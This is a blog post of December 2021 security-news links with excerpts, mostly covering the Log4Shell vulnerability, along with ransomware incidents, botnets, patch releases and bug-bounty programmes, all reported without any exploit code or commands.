This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
https://github.com/YfryTchsGD/Log4jAttackSurface
Tomi Engdahl says:
https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md
Description
Evidence
• vCenter, vCloud
• kb.vmware.com/s/global-search/%40uri#q=Log4j
• VMware Response to CVE-2021-44228: Apache Log4j Remote Code Execution (87068)
A critical vulnerability in Apache Log4j identified by CVE-2021-44228
has been disclosed that may allow for remote code execution.
VMware has classified this issue as critical and is working on
publishing fixes and workarounds as a priority.
Tomi Engdahl says:
Hackers Steal Research Data From Sweden’s Volvo Cars
https://www.securityweek.com/hackers-steal-research-data-swedens-volvo-cars
Swedish manufacturer Volvo Cars said Friday that hackers had stolen research and development data from its systems in a cyberattack.
The company, owned by China’s Geely, “has become aware that one of its file repositories has been illegally accessed by a third party,” it said.
“Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion,” Volvo added.
It warned that “there may be an impact on the company’s operation” from the hack, sending its stock falling 3.5 percent in Stockholm, to 72.44 kronor ($8.00, 7.06 euros).
But the company added there was likely no “impact on the safety or security of its customers’ cars or their personal data”.
Tomi Engdahl says:
Indian PM’s Twitter Hacked Again by Crypto Scammers
https://www.securityweek.com/indian-pms-twitter-hacked-again-crypto-scammers
Indian Prime Minister Narendra Modi’s Twitter account was hacked Sunday with a message declaring his country had adopted bitcoin as legal tender and was distributing the cryptocurrency to citizens.
Modi is a prolific tweeter and is the world’s most popular incumbent politician on the platform, with more than 73 million followers on his main account.
A swiftly deleted tweet from his main @narendramodi handle said the Indian government had officially bought 500 bitcoin and was “and distributing them to all residents of the country”, along with a scam link.
His office tweeted that the account was “very briefly compromised” and that Twitter had since restored control.
Tomi Engdahl says:
UK Court Allows Assange’s Extradition to US for Spying Case
https://www.securityweek.com/uk-court-permits-assange-extradition-us-spying-charges
A British appellate court opened the door Friday for Julian Assange to be extradited to the United States by overturning a lower court’s decision that the WikiLeaks founder’s mental health was too fragile to withstand the American criminal justice system.
The High Court in London ruled that U.S. assurances were enough to guarantee Assange would be treated humanely and directed a lower court judge to send the extradition request to Britain’s interior minister for review. Home Secretary Priti Patel, who oversees law enforcement in the U.K., will make the final decision on whether to extradite Assange.
“There is no reason why this court should not accept the assurances as meaning what they say,″ the High Court ruling stated. “There is no basis for assuming that the USA has not given the assurances in good faith.”
Assange’s fiancé, Stella Moris, called the decision a “grave miscarriage of justice” and said Assange’s lawyers would seek to appeal to the U.K. Supreme Court.
“We will fight,” Moris said outside court, where supporters gathered with banners demanding Assange’s release.
Tomi Engdahl says:
New White House policy gives agencies 24 hours to assess cyberattacks of potential national security concern
https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.cnn.com%2F2021%2F12%2F10%2Fpolitics%2Fwhite-house-red-line-policy-cyberattacks%2Findex.html&h=AT3tZWtdkuXVFhovtxPSRc0RrMHev3qTCkExTIoAHt0RKEJt9lMuIgTZ9et65IA6lA4BhMGxgqMEXcD2daGBf1DFeav-gGuLslXWQoXMgvq54sz86XPxOM7sHSTeqWmykw
(CNN) – The White House has enacted a new policy requiring the FBI and other agencies to help US officials quickly assess whether a cyberattack “rises to the level of a national security concern” that could hamper the provision of key services such as fuel or food, according to a National Security Council memo obtained by CNN and two US officials.
Tomi Engdahl says:
Critical Vulnerability In Java log4j Affecting UniFi, Apple, Minecraft, and Many Others!
https://www.youtube.com/watch?v=CvkUPvIMM7o
Huntress Blog Post
Critical RCE Vulnerability: log4j – CVE-2021-44228
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
Our team is currently investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.
If your organization uses the log4j library, you should upgrade to log4j-2.15.0.rc2 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your vendors push security updates out for their affected products.
The log4j package may be bundled in with software you use provided by any given vendor. In this scenario, unfortunately, the vendors themselves will need to push the security updates downstream. As you assess your own risk and threat model, please consider the components of the software you use and especially what may be publicly accessible.
Fellow MSP community member Tom Lawrence had confirmed and informed Huntress that the UniFi controller platform is vulnerable. If you use this technology, we urge you to upgrade to the patched version 6.5.54 as soon as possible.
Tomi Engdahl says:
Log4j-varoitus punaiseksi – yksi merkittävimpiä haavoittuvuuksia
https://www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021
10.12.2021 julkaistu keltainen varoitus on muutettu punaiseksi haavoittuvuuden vakavuuden tarkennuttua. Internetpalveluissa erittäin laajasti käytetyn, haavoittuvan Log4j-komponentin hyväksikäyttötapauksia havaitaan jatkuvasti lisää. Ylläpitäjiltä vaaditaan nopeaa reagointia. Vastaamme tässä artikkelissa myös aihetta koskeviin usein kysyttyihin kysymyksiin.
Tomi Engdahl says:
Internetistä löytyi haavoittuvuus, joka koskee käytännössä jokaista käyttäjää, hyväksikäyttöyritysten määrä räjähti viikonloppuna https://www.hs.fi/talous/art-2000008472050.html
Tietoturvatutkijat kertoivat viime viikolla haavoittuvuudesta, joka on löydetty avoimen lähdekoodin ohjelmistoja tarjoavan Apache-järjestön Log4j-komponentista. Haavoittuvuuteen liittyvien hyväksikäyttöyritysten määrä kasvoi viikonlopun aikana räjähdysmäisesti, kertoo Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus. “Aika hyvä tiivistys tilanteesta on, että internet on tulessa eikä tavallinen kansalainen voi tehdä asialle mitään”, sanoo keskuksen tietoturva-asiantuntija Juho Jauhiainen.
Tomi Engdahl says:
Java-aukon vakavuus kirkastui: “Internet on tulessa”
https://www.tivi.fi/uutiset/java-aukon-vakavuus-kirkastui-internet-on-tulessa/5155b7b1-57d2-4b4b-8b09-318b50de6c35
Yksi pieni tekstinpätkä: kopioi ja liitä oikeaan paikkaan ja valmista.
Vastikään julkistettu, nimen Log4shell saanut nollapäivähaavoittuvuus on kuin yleisavain internetiin. Se vaikuttaa miljooniin yhtiöihin, ja sen hyväksikäyttö on niin helppoa, että jopa Pihtiputaan mummo voisi sen avulla murtautua palvelimelle etänä ilman kirjautumista järjestelmään. myös:
https://www.is.fi/digitoday/tietoturva/art-2000008471124.html. myös:
https://www.iltalehti.fi/tietoturva/a/9408b302-744c-4afa-9b17-6d3f881ba470
Tomi Engdahl says:
log4shell – Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
Log4Shell explained how it works, why you need to know, and how to fix it https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/
Tomi Engdahl says:
Ten families of malicious samples are spreading using the Log4j2 vulnerability Now https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/
Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10. It looks like the race between the offense and defense has started, and the offense side is wasting no time to jump into the game.
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/
In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).
Tomi Engdahl says:
Bitcoin-huijarit vievät uhreiltaan miljoonia ja henkilötiedot suomalainen voi päätyä tietämättään osalliseksi jopa huumekartelliin
https://yle.fi/uutiset/3-12225404
Huijarit veivät Jarmolta lähes sata tuhatta euroa. MOT-toimitus alkoi selvittää tapausta ja päätyi valtavan huijaustehtaan jäljille.
Tomi Engdahl says:
Diavol Ransomware
https://thedfirreport.com/2021/12/13/diavol-ransomware/
The malware (BazarLoader) was delivered to an endpoint via email, which included a link to OneDrive. The OneDrive link, directed the user to download a file that was a zip, which included an ISO inside.
Once opened (mounted) on the users system, it was determined the ISO contained a LNK file and a DLL. The LNK file masqueraded as a Document enticing the user to click/open it. Once the user executed the LNK file, the BazarLoader infection was initiated. After around 42 hours post initial intrusion, the threat actors pushed towards completion of their final objective. RDP access was established from the central file server that the threat actors had compromised to all endpoints and a batch script named “kill.bat” was executed on all of the targeted machines.
Tomi Engdahl says:
Karakurt rises from its lair
https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation
Accenture Security has identified a new threat group, the self-proclaimed Karakurt Hacking Team, that has impacted over 40 victims across multiple geographies. The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach. Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment. In addition, Accenture Security assesses with moderate-to-high confidence that the threat group’s extortion approach includes steps to avoid, as much as possible, drawing attention to its activities.
Tomi Engdahl says:
Cyber-attack on Hellmann Worldwide Logistics https://www.infosecurity-magazine.com/news/cyberattack-on-hellmann-worldwide/
A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. Hellmann said that since the attack was discovered, it has been under the constant observation of its Global Crisis Taskforce, which is analyzing the incident. The company has also hired “external renowned security specialists” to investigate the attack. Hellmann did not disclose the exact nature of the attack, which is still under investigation.
Tomi Engdahl says:
Ukraine arrests 51 for selling data of 300 million people in US, EU https://www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/
Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe. “As a result of the operation, about 100 databases of personal data relevant for 2020-2021 were seized, ” the Cyberpolice Department of the National Police of Ukraine said. “The seized databases contained information on more than 300 million citizens of Ukraine, Europe and the United States”
Tomi Engdahl says:
Intel adds payout bonuses as it migrates bug bounty program to Intigriti https://portswigger.net/daily-swig/intel-adds-payout-bonuses-as-it-migrates-bug-bounty-program-to-intigriti
Intel is applying a 12-month bonus incentive to bug bounty rewards on select lines of hardware and firmware, which lifts the payout ceiling for the most critical bugs from $100, 000 to $150, 000.
Tomi Engdahl says:
Bugs in billions of WiFi, Bluetooth chips allow password, data theft https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/
Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. In their paper, the researchers explain how they could perform OTA (Over-the-Air) denial of service, code execution, extract network passwords, and read sensitive data on chipsets from Broadcom, Cypress, and Silicon Labs.
Research paper (PDF): https://arxiv.org/pdf/2112.05719.pdf
Tomi Engdahl says:
CISA Expands ‘Must-Patch’ List With Log4j, FortiOS, Other Vulnerabilities
https://www.securityweek.com/cisa-expands-must-patch-list-log4j-fortios-other-vulnerabilities
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 13 new vulnerabilities to its list of security errors known to be exploited, including Apache Log4j and Fortinet FortiOS bugs that were disclosed last week.
Tracked as CVE-2021-44228 and dubbed Log4Shell, the Log4j flaw can be exploited to achieve remote code execution and it affects many applications. Thousands of organizations worldwide are potentially exposed to attacks and exploitation attempts are on the rise.
Fortinet last week published an advisory to warn of an arbitrary file download vulnerability in FortiOS, which a local authenticated attacker could exploit using specially crafted update packages. The bug is tracked as CVE-2021-44168.
Tomi Engdahl says:
Companies Respond to Log4Shell Vulnerability as Attacks Rise
https://www.securityweek.com/companies-respond-log4shell-vulnerability-attacks-rise
Government organizations and the private sector are responding to the disclosure of a critical vulnerability affecting the widely used Log4j logging utility, as exploitation attempts are on the rise.
Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.
It came to light recently that the cross-platform library is affected by a critical remote code execution vulnerability — tracked as CVE-2021-44228 and dubbed Log4Shell — that can be exploited to gain complete access to the targeted system by getting the affected application to log a specially crafted string.
Log4Shell was reported to Log4j developers by the Alibaba cloud security team on November 24 and a patch was made available on December 6 with the release of version 2.15.0. Proof-of-concept (PoC) exploits were developed shortly after.
The list of affected companies and software includes Apple, Tencent, Twitter, Baidu, Steam, Minecraft, Cloudflare, Amazon, Tesla, Palo Alto Networks, IBM, Pulse Secure, Ghidra, ElasticSearch, Apache, Google, Webex, LinkedIn, Cisco and VMware. The list is being regularly updated.
Attacks exploiting Log4Shell
Cloudflare reported seeing evidence of exploitation on December 1, but mass exploitation began only after the flaw was publicly disclosed. While most of the activity observed until now has focused on the identification of vulnerable systems exposed to the internet, there has been a significant increase in actual attacks exploiting Log4Shell.
The SANS Institute reported seeing the zero-day vulnerability being exploited in the wild to deliver cryptocurrency miners.
Cisco’s Talos research and intelligence unit has seen exploitation attempts by APT groups, as well as botnets such as Mirai. The Netlab unit at Chinese cybersecurity firm Qihoo 360 reported seeing Log4Shell attacks involving the Muhstik botnet.
Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), on Friday issued a statement pointing out that the vulnerability has been added to the agency’s catalog of known exploited flaws, which compels federal civilian agencies to immediately address it.
Tomi Engdahl says:
Mirai-Based ‘Manga’ Botnet Targets Recent TP-Link Vulnerability
https://www.securityweek.com/mirai-based-manga-botnet-targets-recent-tp-link-vulnerability
A newly discovered variant of the Mirai-based Manga botnet is targeting a vulnerability in TP-Link routers that was addressed last month.
Tracked as CVE-2021-41653, the bug affects the TL-WR840N EU v5 home wireless router devices running firmware iterations up to version TL-WR840N(EU)_V5_171211. TP-Link released an update that patches the flaw on November 12, the same day the flaw was made public.
Described as a post-authentication remote code execution vulnerability, the issue allows remote attackers to run arbitrary commands via crafted payloads in an IP address input field.
The Mirai-based Manga botnet, Fortinet’s FortiGuard Labs reports, exploits the security error to fetch and execute a malicious script that in turn downloads the main binary payloads.
Tomi Engdahl says:
Apple Patches 42 Security Flaws in Latest iOS Refresh
https://www.securityweek.com/apple-patches-42-security-flaws-latest-ios-refresh
Apple has released a major point-update to its flagship iOS mobile operating system, beefing up app privacy protections and patching at least 42 security defects that expose users to malicious hacker attacks.
The new iOS 15.2 makeover from Cupertino documents security vulnerabilities in multiple components, some serious enough to lead to code execution attacks if iPhone or iPad users simply open image or audio files.
According to an Apple advisory released Monday, 24 of the 42 documented CVEs could lead to arbitrary code execution attacks. The majority are listed as memory corruption, buffer overflows and use-after-free bugs, another confirmation that memory safety issues continue to haunt code shipped in Apple’s wildly popular products.
https://support.apple.com/en-us/HT212976
Tomi Engdahl says:
Logistics Firm Hellmann Scrambling to Recover From Cyberattack
https://www.securityweek.com/logistics-firm-hellmann-scrambling-recover-cyberattack
International logistics company Hellmann Worldwide Logistics is scrambling to restore operations after a cyberattack forced it to isolate its central data center from the rest of its environment.
Just before the weekend, the company revealed that the incident materially affected its operations, mainly because of severed connections to the data center. The logistics provider also said it contracted external security specialists to help with the restoration process.
As of Monday morning, Hellmann brought most operations back online, but wasn’t running at full capacity.
Tomi Engdahl says:
Germany Jails Operators of ‘Cyberbunker’ Darknet Hub
https://www.securityweek.com/germany-jails-operators-cyberbunker-darknet-hub
Tomi Engdahl says:
Tim Starks / CyberScoop:
CISA Director Jen Easterly says the Log4j flaw likely affects hundreds of millions of devices and may be the most serious bug she has seen in her career — Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability …
CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices
https://www.cyberscoop.com/log4j-cisa-easterly-most-serious/
Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career, if not the most serious.”
“We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said of the Apache Log4j flaw. The issue is an unauthenticated remote execution vulnerability that could allow an intruder to take over an affected device.
It’s going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, Gazlay said.
“There’s no single action that fixes this issue,” Gazlay said. It’s a mistake to think anyone is “going to be done with this in a week or two.”
Easterly’s advice was to make sure organizations have their security teams staffed over the holidays, take “all necessary steps to close easily exploitable weaknesses” and share even more information than usual with CISA.
Tomi Engdahl says:
https://www.bloomberg.com/news/articles/2021-12-13/how-apache-raced-to-fix-a-potentially-disastrous-software-flaw
Tomi Engdahl says:
Dan Goodin / Ars Technica:
Kronos, one of the largest HR and workflow management companies, says a ransomware attack knocked its systems offline, possibly for the next several weeks — Kronos outage will last several weeks. Firm advises customers to use other services. — As the world is beset by Log4Shell …
As Log4Shell wreaks havoc, payroll service reports ransomware attack
Kronos outage will last several weeks. Firm advises customers to use other services.
https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/
As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.
Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”
“We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Cloudflare and Cisco Talos say Log4j zero-day attacks were first observed on December 1 and December 2, ahead of mass exploitation over the weekend
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/
While a public proof-of-concept code was released last Thursday, attacks exploiting the Log4Shell vulnerability started two weeks ago.
Tomi Engdahl says:
Inside the Race to Fix a Potentially Disastrous Software Flaw
Employee at Alibaba’s cloud-security team alerted Apache’s developers of the flaw and urged them to ‘please hurry up’
https://www.bloomberg.com/news/articles/2021-12-13/how-apache-raced-to-fix-a-potentially-disastrous-software-flaw
At 2:51 p.m. on Nov. 24, members of an open-source software project received an alarming email. The contents threatened to undermine years of programming by a small group of volunteers and unleash massive cyberattacks across the globe.
“I want to report a security bug,” wrote Chen Zhaojun, an employee on Alibaba Group Holding Ltd.’s cloud-security team, adding “the vulnerability has a major impact.”
The message went on to describe how a hacker could take advantage of Log4j, a widely used software tool, to achieve what’s known as remote code execution, a hackers’ dream because they can remotely take over a computer.
The message ultimately set off a global race to update critical computer systems, with senior U.S. cybersecurity officials describing the discovery as a “significant threat.” Left unfixed, the software could give attackers unfettered access to untold millions of computer systems.
But behind the scenes, a small cadre of unpaid programmers went to work to patch the faulty software.
It is open-source software that is maintained by a group of volunteer programmers as part of the nonprofit Apache Software Foundation, one of dozens of open-source projects that have become a crucial component of global commerce and that are mostly maintained by unpaid volunteers.
After receiving the email from Chen, Apache’s volunteer programmers began working to fix the vulnerability before the rest of the world knew there was a problem.
But on Dec. 8, the team received another email from Alibaba’s Chen, notifying them that someone had just revealed the details of the vulnerability on a Chinese blogging platform for the entire internet to see. “Some WeChat security chat groups are already discussing the details of the vulnerability, and some security researchers already have the vulnerability,” Chen wrote. “We promise to keep it secret until your official release version comes out. Please hurry up.”
The person who published the details of the flaw, who uses a pseudonym, didn’t respond to a request for comment.
By then, hackers had already started exploiting the flaw, according to a tweet by CloudFlare Chief Executive Officer Matthew Prince. Some 20 hours later, Apache’s team working on Log4j published a “patch” to fix the problem. That’s when hackers began “mass exploitation” of the flaw, according to Prince.
In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in Log4j since September 2013, apparently unknown to its vast universe of users.
However, the impact of the Log4j flaw remains unknown. Because the software exists in so many products and services, it may be months — or even years — before every version of it receives the update, according to security experts. So far, no major hacks have been tied to the vulnerability.
Security researchers have found applications by Apple, Twitter and dozens of other companies using Log4j. There is no indication any have suffered a security breach as a result.
“I was thinking, ‘Oh my God. This is my project. And then I was thinking, Apple is involved. Twitter is impacted. Everything,” he said. “And then, I was just realizing, how many people were using using this software. This is basically half of the world, maybe even more. This is just crazy.”
He described the conversations among the Log4j group as dispassionate and earnest. “I know these people — they all have families and things they have to do. But they put everything aside and just sat down for the whole weekend and worked on that,” he said.
The vulnerability discovered in Log4j highlights how much modern software relies on open source projects maintained by unpaid volunteers, and what happens when a major security vulnerability is discovered within one.
“The scenarios are endless,” said Mark Curphey, founder of the Open Web Application Security Project
Since the flaw was disclosed, some anger has been directed at Apache’s developers. And there were warning signs that that Log4j may be vulnerable, including at a presentation at the Black Hat cybersecurity conference in 2016. There, researchers identified a method to exploit a broad class of software that included Log4j, according to Daniel Stenberg, who created one of the world’s most-used pieces of open-source software, called Curl, that is used for transferring data between applications.
“Why wasn’t it fixed then? I really don’t know,” Stenberg said. “It seems the Logj4 authors really didn’t understand that they had a ticking bomb in their code even after that was highlighted. Clearly the Log4j project needed an outsider to poke them in the eye and really make the aware of the problem. How do you force that to happen? Not easy.”
Tomi Engdahl says:
Hackers launch over 1.2 million attacks through Log4J flaw
Researchers claim Chinese government groups are among the perpetrators
https://www.ft.com/content/d3c244f2-eaba-4c46-9a51-b28fc13d9551
Hackers including Chinese state-backed groups have launched more than 1.2 million attacks on companies globally since last Friday
Cyber security group Check Point said the attacks relating to the vulnerability had accelerated since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.
The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.
Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was “one of the most serious I’ve seen in my entire career, if not the most serious”, according to US media reports. Hundreds of millions of devices are likely to be affected, she said.
Amazon, Apple, IBM, Microsoft and Cisco are among those that have rushed to put out fixes, but no severe breaches have been reported publicly so far.
“With this vulnerability, attackers gain almost unlimited power — they can extract sensitive data, upload files to the server, delete data, install ransomware or pivot to other servers,”
The source of the vulnerability is faulty code developed by unpaid volunteers at the non-profit Apache Software Foundation, which runs multiple open source projects, raising questions about the security of vital parts of IT infrastructure. Log4J has been downloaded millions of times.
Tomi Engdahl says:
Chinese hackers are exploiting ‘fully weaponised’ software vulnerability which is causing ‘mayhem on the web’ and poses a threat to internet-connected devices worldwide, experts warn
https://www.dailymail.co.uk/news/article-10307697/Chinese-hackers-exploiting-fully-weaponised-Log4shell-software-vulnerability.html
Tomi Engdahl says:
Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild
While most of the attacks observed so far seem to be targeting Linux servers, we have also seen attacks against systems running the Windows operating system. For these attacks, we have detected the attempt to deploy a ransomware family called Khonsari.. also:
https://twitter.com/JuhoJauhiainen/status/1470849684428443651?s=20
Log4j: Getting ready for the long haul (CVE-2021-44228) https://isc.sans.edu/forums/diary/Log4j+Getting+ready+for+the+long+haul+CVE202144228/28130/
Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon. Treat it as such. Mick pointed that out in our live stream yesterday, and it is probably the most important thing you need to plan for now: How to live with log4shell long term.
CISA tells federal agencies to patch Log4Shell before Christmas https://therecord.media/cisa-tells-federal-agencies-to-patch-log4shell-before-christmas/
The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve. CISA – Apache Log4j Vulnerability
Guidance:
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
What the Log4Shell Bug Means for SMBs: Experts Weigh In https://threatpost.com/log4shell-bug-smbs-experts/177021/
An exclusive roundtable of security researchers discuss the specific implications of CVE-2021-44228 for smaller businesses, including what’s vulnerable, what an attack looks like and to how to remediate.
Implications of Log4j Vulnerability for Operational Technology (OT) Networks https://www.dragos.com/blog/industry-news/implications-of-log4j-vulnerability-for-ot-networks/
Given that Log4j has been a ubiquitous logging solution for Enterprise Java development for decades, Log4j has the potential to become a vulnerability that will persist within Industrial Control Systems
(ICS) environments for years to come. Within ICS environments, Dragos anticipates OT operators will face one of three scenarios when working to mitigate Log4j vulnerabilities.
Tomi Engdahl says:
Catalin Cimpanu / The Record:
CISA orders US federal civilian agencies to patch systems affected by the Log4j vulnerability by December 24 — The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.
CISA tells federal agencies to patch Log4Shell before Christmas
https://therecord.media/cisa-tells-federal-agencies-to-patch-log4shell-before-christmas/
Tomi Engdahl says:
Tal Eisner / Check Point Software:
Analysis: Log4j attacks rose from a few thousand on December 10 to 800K+ within 72 hours; exploits have been attempted on ~44% of corporate networks globally — Precisely one year after the SolarWinds Hack, the groundbreaking supply chain attack the world experienced, and while organizations
The Numbers Behind Log4j Vulnerability CVE-2021-44228
https://www.epanorama.net/blog/2021/12/01/cyber-security-news-december-2021/comment-page-4/#comment-1746224
Tomi Engdahl says:
Martin Matishak / The Record:
The US Department of Homeland Security launches “Hack DHS”, a bug bounty program that pays hackers between $500 and $5,000 per flaw found in its systems — The Homeland Security Department has launched a bug bounty program that will allow hackers to report vulnerabilities …
Homeland Security launches ‘Hack DHS’ bug bounty program
https://therecord.media/homeland-security-launches-hack-dhs-bug-bounty-program/
Tomi Engdahl says:
Bloomberg:
Sources: the NSO Group is considering shuttering its Pegasus unit or selling it, amid US restrictions and the danger of defaulting on $450M in debt
https://www.bloomberg.com/news/articles/2021-12-13/spyware-firm-nso-mulls-shutdown-of-pegasus-unit-sale-of-company
Tomi Engdahl says:
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/
While a public proof-of-concept code was released last Thursday, attacks exploiting the Log4Shell vulnerability started two weeks ago.
The first attacks were observed on December 1 and December 2, according to Cloudflare and Cisco Talos, respectively.
Tomi Engdahl says:
LogJ4 leviää vauhdilla, jopa sata murtoa minuutissa
https://etn.fi/index.php/13-news/12952-logj4-leviaeae-vauhdilla-jopa-sata-murtoa-minuutissa
Apache-palvelinten java-komponentin LogJ4-haavoittuvuutta hyödynnetään nyt kiihtyvällä vauhdilla. Tietoturvayritys Check Pointin mukaan reikään on hyökätty sadan murron minuuttivauhdilla. 72 tuntia haavoittuvuuden löytymisen ja sen hyödyntämisen alkamisen jälkeen hyökkäyksiä oli jo 846 000.
Sadoista tuhansista hyökkäyksistä 46 prosenttia on voitu paikantaa tunnettuihin kyberrikollisryhmiin, Check Point sanoo. Jo nyt yli 40 prosenttia maailman yritysverkoista on joutunut hyökkäyksen kohteeksi. Suomessa prosenttiluku oli 36.
Tietoturva-ammattilaisten mukaan LogJ4 todennäköisesti tulee haittaamaan isoja verkkopalveluja, kuten MineCraftia, Twitteriä ja Applen iCloudia.
Tomi Engdahl says:
Log4Shell explained – how it works, why you need to know, and how to fix it
https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/
log4shell – Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
Log4j-varoitus punaiseksi – yksi merkittävimpiä haavoittuvuuksia
https://www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021
Tomi Engdahl says:
https://hackaday.com/2021/12/10/this-week-in-security-printing-shellz-ms-officecmd-and-ai-security/
Researchers at f-secure have developed an impressive new attack, leveraging HP printers as an unexpected attack surface. Printing Shellz (PDF) is a one-click attack, where simply visiting a malicious webpage is enough to get a shell and reverse proxy installed to a printer on the same network. The demo below uses a cross-site printing (XSP) attack to send the malicious print job to the printer without any further interactions.
https://labs.f-secure.com/publications/printing-shellz
https://labs.f-secure.com/assets/BlogFiles/Printing-Shellz.pdf
Tomi Engdahl says:
HR Management Firm Kronos Needs Weeks to Recover From Ransomware Attack
https://www.securityweek.com/hr-management-firm-kronos-needs-weeks-recover-ransomware-attack
HR management platform Ultimate Kronos Group (UKG) on Monday started notifying customers that it fell victim to a ransomware attack that took down multiple applications over the weekend.
The attack, which took place on Saturday, December 11, 2021, targeted Kronos Private Cloud, a service on which the company runs several of its cloud applications, including Banking Scheduling Solutions, Healthcare Extensions, UKG TeleStaff, and UKG Workforce Central.
Tomi Engdahl says:
EXPLAINER: The Security Flaw That’s Freaked Out the Internet
https://www.securityweek.com/explainer-security-flaw-thats-freaked-out-internet
Security pros say it’s one of the worst computer vulnerabilities they’ve ever seen. They say state-backed Chinese and Iranian hackers and rogue cryptocurrency miners have already seized on it.
The Department of Homeland Security is sounding a dire alarm, ordering federal agencies to urgently eliminate the bug because it’s so easily exploitable — and telling those with public-facing networks to put up firewalls if they can’t be sure. The affected software is small and often undocumented.
Detected in an extensively used utility called Log4j, the flaw lets internet-based attackers easily seize control of everything from industrial control systems to web servers and consumer electronics. Simply identifying which systems use the utility is a prodigious challenge; it is often hidden under layers of other software.
Tomi Engdahl says:
Microsoft Patches 67 Security Flaws, Including Zero-Day Exploited by Emotet
https://www.securityweek.com/microsoft-patches-67-security-flaws-including-zero-day-exploited-emotet
Microsoft’s security response engine revved into overdrive this month with the release of patches for 67 documented Windows software vulnerabilities, including a zero-day bug that’s already been exploited by one of the most professional and long lasting cybercrime gangs.
In the final Patch Tuesday release for 2021, the Redmond, Wash. software giant called special attention to CVE-2021-43890, a spoofing vulnerability in the Microsoft Windows AppX installer and warned that the bug is being exploited in the wild by the Emotet malware operation.
“Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/Trickbot/Bazaloader,” the company said, warning that the bug allows an attacker to build malicious attachments for use in effective phishing campaigns.
Tomi Engdahl says:
Chinese, Iranian State Hackers Exploiting Log4j Flaw: Mandiant
https://www.securityweek.com/chinese-iranian-state-hackers-exploiting-log4j-flaw-mandiant
Tomi Engdahl says:
